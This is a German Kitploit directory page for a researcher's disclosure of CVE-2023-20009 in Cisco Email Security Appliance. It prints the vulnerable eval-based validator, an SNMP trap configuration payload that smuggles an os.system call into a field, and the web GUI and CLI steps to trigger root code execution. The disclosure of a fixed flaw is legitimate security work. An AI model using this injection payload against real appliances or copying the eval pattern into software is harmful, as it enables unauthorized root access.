Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cisco-CVE-2023-20009 — Cisco Email Security Appliance: Remotecodeausführung - RCE aus der Konfigurationsdatei | Kitploit
Tools/GitHubGitHub/ly1g3/cisco-cve-2023-20009
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubly1g3/cisco-cve-2023-20009

cisco-CVE-2023-20009

Cisco Email Security Appliance: Remotecodeausführung - RCE aus der Konfigurationsdatei

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Über

Sicherheitsforscher: ly1g3, ly1g3[at]tuta.io

GPG-Fingerabdruck: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Übersicht: Remote Code Execution - RCE aus Konfigurationsdatei

CVE: CVE-2023-20009

Zeitleiste:

  • Entdeckt - ly1g3
  • Gemeldet - ly1g3
  • Behoben - Cisco

Cisco AsyncOS 14.2.0

ESA (Cisco Secure Email) und Cisco Secure Email and Web Manager

Privilegieneskalation - Root-Shell

Ein authentifizierter Benutzer mit Berechtigungen für die SNMP-Konfiguration kann beliebigen Code als Root ausführen, indem er eine speziell präparierte SNMP-Trap-Konfiguration verwendet.

Technische Einzelheiten

Ausgenutzter Code ui_checker.py:

root@kitploit:~
def validate_trap_configuration(base, value_dict):
    validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
    for k, v in value_dict.iteritems():
        if validators.has_key(k):
            base, conf_class_str = validators[k].rsplit('.', 1)
            module = __import__(base, fromlist=[conf_class_str])
            conf_class = eval('module.%s("%s")' % (conf_class_str, v))
        else:
            raise FilterError('validate_%s_trap_configuration_value' % (base,),
                              _("Trap does not allow configuration"), k)
    return value_dict

v enthält den Wert von common_trap.common_configuration

root@kitploit:~
<common_trap>
    <common_name>connectivityFailure</common_name>
    <common_enabled>0</common_enabled>
    <common_configuration>http://asd.asd.&quot;+os.system(&quot;touch test.txt&quot;))#,5</common_configuration>
    </common_trap>
<common_trap>

Schritte zum Auslösen über WEB-GUI:

  1. https://192.168.1.10/system_administration/configuration_file
  2. "Konfigurationsdatei vom lokalen Computer laden"
  3. Ersetzen Sie das aktuelle Feld connectivityFailure durch das obige Payload

Schritte zum Auslösen über CLI

  1. loadconfig
  2. Payload einfügen
Tool herunterladen